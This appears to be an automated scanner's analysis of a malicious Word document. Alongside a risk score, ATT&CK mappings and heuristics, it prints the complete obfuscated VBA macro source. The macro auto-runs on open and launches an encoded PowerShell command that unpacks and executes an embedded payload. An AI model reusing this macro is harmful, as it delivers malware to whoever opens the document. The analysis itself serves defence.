MALICIOUS (Risk Score: 150)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the BjPltPav function, which uses the Shell() function to execute a command. This command appears to be constructing a string that likely results in downloading and executing a second-stage payload. The specific command string is partially obfuscated but includes 'vbFkai + powers', suggesting a PowerShell execution.
Heuristics (6)
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA. Matched line in script:
  Next BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765) For kbUul = NojaJ To AJRJEK
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script:
  End Function Sub Autoopen() On Error Resume Next
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 18f783f27469e7d652a1968a748478fe043e59aa693b91d40390695d960a83e0) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12616 bytes |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "GrskhWwiI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjPltPav()
On Error Resume Next
For qqRiW = GhwVj To RsGzp
For YAMGIQ = YWibTE To 48241
KkaAsu = (88725 / CBool(rirzVT) - tTmha / Oct(66325 / Hex(86928) / hApwDb + Rnd(cRHWH / Fix(37))))
Next
fzzwi = 30039 - 40577
Next
For QRXETl = jWwJR To tzCwqJ
For CarwMt = UplwS To 46358
RjStj = (80096 / CBool(vvJMqJ) - zuAnFj / Oct(48839 / Hex(81574) / YsaXnr + Rnd(BrsqcP / Fix(37))))
Next
CHUoGf = 64246 - 73199
Next
BjPltPav = cjTLdQiMkzU + Shell(vbFkai + Chr(zWFUr + vbKeyP + ECBmLnMP) + "owers" + mbhjLO + QNWtNwqq + jATWWtRft + hXUZAbip + dhiZTz + SjwCFiRXE, 67765 - 67765)
For kbUul = NojaJ To AJRJEK
For VzSKj = zflvS To 21953
mWpwSw = (97888 / CBool(dEHBGp) - wCiBU / Oct(47945 / Hex(31105) / RRkjo + Rnd(btQPQI / Fix(37))))
Next
TVqILQ = 84446 - 86480
Next
End Function
Sub Autoopen()
On Error Resume Next
For IdWvj = QRrTVw To iiMKN
For Kqmpj = fjntI To 15825
fGJHN = (87205 / CBool(sczYzm) - vrIvBC / Oct(79514 / Hex(65678) / WnpWB + Rnd(dXiLz / Fix(37))))
Next
RVazR = 32631 - 20123
Next
BjPltPav
For qOsutk = iwHFiz To mTYXvp
For cploMd = hvkli To 111
IvucRN = (97045 / CBool(aGOVj) - HbuVUi / Oct(28319 / Hex(46436) / FhGTw + Rnd(XTEzH / Fix(37))))
Next
XduicB = 6659 - 28911
Next
End Sub
Attribute VB_Name = "aqznaUpQJRP"
Function mbhjLO()
On Error Resume Next
For sfkknb = FGBap To hkaiZ
For qTLvQ = psKjNU To 90880
wwPXXV = (70445 / CBool(kldJjp) - fiIVV / Oct(73261 / Hex(34702) / kTwziH + Rnd(tjfPN / Fix(37))))
Next
VDLDlJ = 68172 - 49693
Next
rUdAbUdo = "HeLL -e IAAoAG" + "4AZQBX" + "AC0ATwBCAEoARQB" + "DAHQAIAAgAFMAe" + "QB" + "zAF" + "QAZQBtA"
For GHzoi = Ezaoj To fDbXC
For OsziR = SKbzRj To 54746
HSMozt = (55723 / CBool(phEah) - pzkjj / Oct(70869 / Hex(40131) / UcpXWU + Rnd(GhqLzH / Fix(37))))
Next
rmZIv = 96071 - 6582
Next
DbozKaYhlw = "C4ASQBPAC4AQw" + "BPAG0AcABSAEUAc" + "wBTAGkATwBOAC4A" + "RABF" + "AGYAbABBAFQ" + "ARQBzAFQAcgBlA" + "EEAbQAo" + "AFsA"
For ZqvwU = NkArNa To kzaXIm
For zOPjOc = wGapW To 57440
CzcZz = (4623 / CBool(zqUkhP) - nzlnL / Oct(39995 / Hex(30785) / bLisT + Rnd(dZCqw / Fix(37))))
Next
hzzzJk = 79839 - 4402
Next
tDLDfi = "UwB" + "ZAFMAdABF" + "AG0ALgBpAG" + "8AL"
For uzhNB = HpCLJ To rXQqGj
For TQRtkW = nCnda To 60156
mjMBi = (32801 / CBool(WjAfn) - qbjHC / Oct(1796 / Hex(22676) / HcFwrd + Rnd(FCYkd / Fix(37))))
Next
FqEpbS = 48499 - 95307
Next
oJjbFO = "gBNAGUATQB" + "vA" + "FIAWQBzAHQ" + "AcgBlAG" + "EAbQB"
For ROzSiL = jaaTf To DGFnnh
For jcuJc = kcRaim To 71213
LrwYuL = (69128 / CBool(zKKwZ) - zkoisj / Oct(916 / Hex(79067) / opzbt + Rnd(ArjuF / Fix(37))))
Next
PGOsVj = 19856 - 58614
Next
KzUiztjBnGr = "dAFsAcwBZ" + "AHMA" + "VABlAG0A" + "LgBjAG8AbgBWA" + "GUAUgBUAF0A" + "OgA6AGY" + "AUgBPAE0AYgB" + "BA" + "HMARQA2" + "ADQAUwB"
For zjLzfh = EuEZWY To jzkqI
For TdCUui = ZlWAqK To 68559
JmdOhN = (75742 / CBool(pfVqwf) - lpChQV / Oct(58783 / Hex(81817) / wDNSY + Rnd(jLoVa / Fix(37))))
Next
Hcajf = 82658 - 23252
Next
pOGXJZJzfV = "0AHIAaQBOAEcAK" + "AAg" + "ACcAVgBa" + "AEIAdAB" + "UADgASgBB" + "AEQATQ" + "BlAC8AeQByADE" + "AWQ" + "BzAGkAMw"
For Zrhtql = ndSTi To aRdAVO
For vJCaFj = NbzkiS To 2408
FVUbmt = (91551 / CBool(VCvPjL) - jKcatP / Oct(79300 / Hex(13537) / GHzMjh + Rnd(MuwMHf / Fix(37))))
Next
brAbjY = 19854 - 38483
Next
QiVKiZzuh = "BLAEw" + "AWQ" + "BaAEUAaABN" + "AFUARQBlAFQA" + "QQBZAE0AOABLAG" + "oAbwBEAEUAe" + "AB0ADEAdABoAEIA" + "KwBOAHU" + "AMwBoAF" + "UAS"
For BiNaCs = OPOjV To wjBnOj
For kzpDR = isoIi To 56110
KvhTHm = (38183 / CBool(iwtzXw) - RZsJaw / Oct(23599 / Hex(4394) / JIBJOa + Rnd(fDjUB / Fix(37))))
Next
ijcPj = 4605 - 5487
Next
SWduE = "ABFAHIANgA3A" + "EIA" + "NABMA" + "EUATgAwADMAYQAz" + "ADcALwB0AHYA" + "MwBXAHc" + "AdQBXAEEAZABjA" + "GsAOABrAEYA" + "QwBVAFYAT" + "AA0A"
mbhjLO = rUdAbUdo + DbozKaYhlw + tDLDfi + oJjbFO + KzUiztjBnGr + pOGXJZJzfV + QiVKiZzuh + SWduE
End Function
Function QNWtNwqq()
On Error Resume Next
For EtEnbO = ZCowt To KwkJXH
For NvocuP = MhLPJz To 87220
OwWnL = (83959 / CBool(BuVHJ) - hrFLu / Oct(26485 / Hex(67277) / FbsMX + Rnd(rqZot / Fix(37))))
Next
Fknnkv = 95042 - 12056
Next
wnMOQTS = "EEAagAwAFU" + "AdwB" + "tAGE" + "AaABVA" + "DYAVQBYAC" + "sAcABYAHc" + "AZ" + "gAvADIAWABC" + "AHI"
For tHmGTf = FDPlKv To Vdaoo
For KVjNJ = zDSbw To 31442
OLUGFD = (44509 / CBool(lVZIo) - aSJJH / Oct(16489 / Hex(82328) / XaYwAi + Rnd(nbQVhh / Fix(37))))
Next
AXVkRO = 47929 - 193
Next
bsIVvUq = "ARQ" + "BGAGEAMABDAD" + "AAZwBuAEUARAB" + "jAHoAQQBSAEoAR" + "ABwA" + "DYA" + "KwBp" + "AFIAdABzAEsAMwB" + "SAFEAeA" + "ByAHcAVwBC"
For FVIWk = SrHld To thIDoN
For uImHcc = lnWqc To 22229
TTbrL = (4157 / CBool(JZNvEK) - qMhdA / Oct(52037 / Hex(11132) / SOjuTW + Rnd(VQJSPa / Fix(37))))
Next
hLcLT = 71476 - 68979
Next
atiZH = "AEsA" + "RQBTAFcAVQB" + "LA" + "DUAVwB"
For LYRKv = oNbkRV To NLRiH
For Dwmluj = fVAoHU To 27604
DIcIaD = (61831 / CBool(hhwFM) - ALcLG / Oct(61406 / Hex(55447) / mXdTv + Rnd(NnczG / Fix(37))))
Next
KCoaj = 51030 - 45748
Next
UsmMkPuX = "3AGMATQAwAGYAZQ" + "BzAEUAOQBW" + "AE4AZ" + "AB3AGcAWQB" + "OAE0" + "AbAB5AGIASQ" + "A4"
For EEwbPL = oLwNi To dWFfH
For NpuEA = EJzXCi To 61898
jUhaB = (7505 / CBool(zYbjjY) - jjivZR / Oct(20422 / Hex(7096) / zvdLB + Rnd(RJRha / Fix(37))))
Next
JofdDZ = 30792 - 33165
Next
KcISw = "AFQAZQAwAD" + "QAVwBoAFoAb" + "gB4AG" + "IATQBxAGcAMAAwA" + "EEAUQBDAE0AYwA" + "vA" + "EgAcABuAHEAaAB" + "hAHgA" + "MgByA"
For YRZLd = oHFOz To KiiYsh
For GSPBw = XsCRV To 85581
mqbiDz = (46145 / CBool(dBLTc) - wFAEL / Oct(83395 / Hex(83322) / BIPbA + Rnd(YlpjV / Fix(37))))
Next
tUHAU = 86059 - 19016
Next
sDWzjGFrEI = "GUAQwAz" + "ADQAMABsAE" + "EASgBH" + "AEIAV" + "ABsADE" + "AUwBqAD" + "YAbgB2AHoAeABtA" + "FQAVw" + "BuA"
For dQDiV = YmCNK To DbpSO
For zRjrMc = ZHiwAj To 35218
ajkEhG = (80215 / CBool(ljcYUz) - iolst / Oct(85643 / Hex(64677) / EblvCu + Rnd(BdsTcv / Fix(37))))
Next
NhVJj = 95009 - 14403
Next
wvbRfOIsaXc = "DEAdwBkADYARw" + "BOAHgAbgBi" + "AEQAbwBZ" + "AGYAdwBZ" + "AH" + "UASABlA" + "GEAWgBRAE" + "0AKwB0AHU" + "AMwA3AG8ANABFA"
For DcaqzJ = rYosu To dwKmnz
For wjBWVZ = DWjJkf To 40043
IVMvd = (72125 / CBool(TikBZk) - LWwzYl / Oct(44827 / Hex(52685) / UZiMU + Rnd(fIPKEn / Fix(37))))
Next
arTzMM = 43139 - 74221
Next
dRbfodk = "HMAMw" + "BhAG4AQgByA" + "DAAeg" + "BrAGUAVABRADkAd" + "QB2AEoAdAByAF" + "UAcQBuAGMAVgBjA" + "HUA" + "MwBWAHAA" + "QQ"
For AqSLN = kGjBh To rVvZS
For wbmOfz = wEfbY To 21011
QzYsu = (17119 / CBool(SXIbDG) - iVYXu / Oct(64818 / Hex(45220) / imKUp + Rnd(IFiKq / Fix(37))))
Next
BrzCfJ = 5322 - 61967
Next
sDGiXqPEzLM = "BuADUAagBr" + "AFoASABRAFEAZwB" + "2ADIA" + "cg" + "AyAHo" + "AcAB4AGMARQ" + "BmA"
QNWtNwqq = wnMOQTS + bsIVvUq + atiZH + UsmMkPuX + KcISw + sDWzjGFrEI + wvbRfOIsaXc + dRbfodk + sDGiXqPEzLM
End Function
Function jATWWtRft()
On Error Resume Next
For dnbrw = iGEid To FRmhZT
For JSiQN = WqYWsl To 59503
HFzjcq = (6808 / CBool(wajMuv) - KVFprW / Oct(72230 / Hex(97012) / NNcWJ + Rnd(LtwqwL / Fix(37))))
Next
wzdHiT = 8447 - 68771
Next
adcwdJVc = "GYAZA" + "B0AGYASAB" + "jAGIASA" + "BNAEsARwAzAEQ" + "ARABtAGYAWABKAG" + "UATwBvADUA" + "MwBjAFUAZw" + "BOAGkAMABpAEoAU" + "ABsADkAZ"
For jaPOA = vnUVHc To PNjRO
For nOEwP = XIMkn To 34693
mNdBGu = (68917 / CBool(zLVdE) - chPaR / Oct(9922 / Hex(80578) / mfiArd + Rnd(jChDNp / Fix(37))))
Next
mLaWi = 79985 - 80038
Next
IdVjIYol = "wA3ADkA" + "RAB" + "2AGQAMgBk" + "AG4A" + "awBkAGIAcQ" + "BwAEMAWgBZAHMA" + "bQBqAHk" + "ATwBDAH"
For jTLLu = wJVMEq To wXFCGu
For IoZrV = vDAua To 599
ivLpj = (66683 / CBool(msLqI) - hnoUUX / Oct(90521 / Hex(52622) / vtUqZj + Rnd(JbmDjs / Fix(37))))
Next
LQWXr = 52976 - 29461
Next
aMRGrLnEi = "MAcA" + "BTAE0AMQBSA" + "EMAMwBrADM" + "AUABPAHYAeQBXAG" + "0AcABIAH"
For jiWnHP = aCFfnA To VqIXt
For jEFPpk = DzADzf To 35641
lTmYd = (58246 / CBool(jwEEC) - vjPUhj / Oct(85979 / Hex(59423) / GzWmbc + Rnd(BfHiI / Fix(37))))
Next
WWwQEi = 39972 - 12556
Next
zMmFU = "cANgBSAGEAUwB" + "6ADEAd" + "ABPA" + "EoAZwB6AEwAawB" + "jAHgAb" + "gBiAEwA"
For kijIR = jSzZfI To oCrCY
For zYwUlL = sVRbJ To 19458
vNnDT = (21314 / CBool(RNIId) - JhwZCK / Oct(76770 / Hex(18090) / oOzwHr + Rnd(AYQVm / Fix(37))))
Next
bOnjN = 28919 - 59926
Next
CbsNt = "TQB0AH" + "gAegBoAGoAegB" + "kAEYAVgBvAGc" + "AbABGAE"
jATWWtRft = adcwdJVc + IdVjIYol + aMRGrLnEi + zMmFU + CbsNt
End Function
Function hXUZAbip()
On Error Resume Next
For oLIlA = ZsZzW To IYYFW
For ZEMjs = nsGhl To 35812
YiczCp = (21746 / CBool(jnIzQ) - ZJCpiN / Oct(18557 / Hex(79110) / wETAzI + Rnd(sGGCz / Fix(37))))
Next
fZVPKz = 87049 - 31478
Next
SKpZuJnZ = "oAbABrAEQAZwB" + "mAHQATA" + "AzAGgAawBLAE4" + "AUQBrAGsAYQAy" + "AGc" + "AOAAwAGgAMwB"
For kbJOi = rCFnj To iujpN
For bvCsOB = ddTTCM To 92061
uUsqj = (49786 / CBool(BEBPN) - BimZzz / Oct(34287 / Hex(40225) / rNHXF + Rnd(XjCan / Fix(37))))
Next
karwiX = 49125 - 89244
Next
TUjStiw = "PADkALwBBAEEAP" + "QA9ACcAIAAp" + "AC" + "AALABb" + "AEkATwAu" + "AEMATwBN" + "AFAAcgBFAHMAcw"
For rwnLbz = tFMips To iiLUcd
For woZmQ = vaSbs To 50981
AOTMd = (49786 / CBool(pzOJDs) - MPSDzQ / Oct(56374 / Hex(86337) / OYLwl + Rnd(mllPo / Fix(37))))
Next
PPzqCn = 59700 - 1500
Next
TdPjER = "BpAE8ATgA" + "uAEMAb" + "wBtAFAAU" + "gBlAFMAUwBJ" + "AG8ATgBNA" + "E8ARABFAF0AOgA"
For PjYFiK = YvJaH To FnSdE
For LcYoD = wATMu To 56963
skwpmr = (4889 / CBool(mMqFN) - LJLYY / Oct(66178 / Hex(16039) / zrvUil + Rnd(jLAjc / Fix(37))))
Next
UHwjm = 4384 - 27856
Next
KVXzjj = "6AEQARQBjAE8Ab" + "QBwAHIARQ" + "BzA" + "FMA" + "KQB8AGYATwBSA" + "EUAQQBDAEgAI" + "AB" + "7ACAAbgBlA" + "FcA" + "LQBPA"
hXUZAbip = SKpZuJnZ + TUjStiw + TdPjER + KVXzjj
End Function
Function dhiZTz()
On Error Resume Next
For QhiqD = rIoVvp To mGuRI
For wFBqZ = EqCMsm To 61801
QhKMif = (488 / CBool(YXikm) - hAEOd / Oct(72570 / Hex(31006) / OrJEw + Rnd(pvvjPw / Fix(37))))
Next
FwhndQ = 61378 - 64922
Next
RJkHD = "EIASg" + "BFAEMAdAAg" + "AEkATwAuAF" + "MAdABSAGUAY"
For LozrJB = dIudz To TDZjF
For cbuVqa = EWbAVk To 71866
fUFHln = (74746 / CBool(bUSon) - iNzKCE / Oct(4814 / Hex(32909) / IQhzl + Rnd(IYtLh / Fix(37))))
Next
iTYTpp = 17786 - 36765
Next
whapps = "QBNAFIAZQBB" + "AEQAZQBSACgA" + "IAAkAF8AIAAs" + "ACAAWwBUAEUAW" + "AB" + "UAC4AZ" + "QBuAEMAbwB" + "kAGkA" + "bg" + "BHAF0AOgA"
For Xlobs = CKhji To BzrDq
For QTvYd = pvtZq To 25108
tzRki = (86114 / CBool(toFOL) - zZjWhQ / Oct(98369 / Hex(78204) / zFzIjl + Rnd(TdTURo / Fix(37))))
Next
kMMLU = 15795 - 53140
Next
MzvWzlj = "6AGEAUwBjAG" + "kAaQApAH0AfAAgA" + "EYATwBS" + "AGUAYQBD" + "AGgAIAB7AC" + "AAJABfAC4A" + "cgBFAGEARABUAE" + "8ARQBOAEQAK" + "AAgACkAIAB9AC" + "AAKQB8ACYAKAAgA"
For hMzFP = XraNa To wMlWJ
For wUcurO = JwKUF To 58707
RmYmLi = (42273 / CBool(wlsGro) - XaqBk / Oct(22584 / Hex(13909) / mVjuGT + Rnd(XVjti / Fix(37))))
Next
ozLfN = 29501 - 45643
Next
iuTSNjzAko = "CgAWwBTAFQAcg" + "BJAE4ARwBdACQA" + "dgBFAFIAQgB" + "vAFMA"
For BkWVqY = iDtUKB To QbjPNj
For WXzGG = bfWWwj To 89793
kMYQvd = (86163 / CBool(pZYKC) - jvwBob / Oct(59543 / Hex(26400) / PkoIw + Rnd(WYaGAj / Fix(37))))
Next
KwSGV = 8214 - 64619
Next
upkznorp = "ZQ" + "BQ" + "AFI" + "AZQ"
dhiZTz = RJkHD + whapps + MzvWzlj + iuTSNjzAko + upkznorp
End Function
Function SjwCFiRXE()
On Error Resume Next
For iwjsv = XuvSFW To JfGUtm
For AzDBB = lAihG To 51335
BjoHPD = (10206 / CBool(dfnvJc) - SMlbR / Oct(28658 / Hex(44534) / sirbpX + Rnd(NMiqk / Fix(37))))
Next
rwFqhT = 45150 - 33993
Next
NfONGqsJMPG = "BGAGUAcgBlAG4" + "AYwBlAC" + "kAWwAxACwAMwB" + "dACsAJwB4ACc" + "ALQBKAE8AaQBOA" + "CcAJwApAA=="
SjwCFiRXE = NfONGqsJMPG
End Function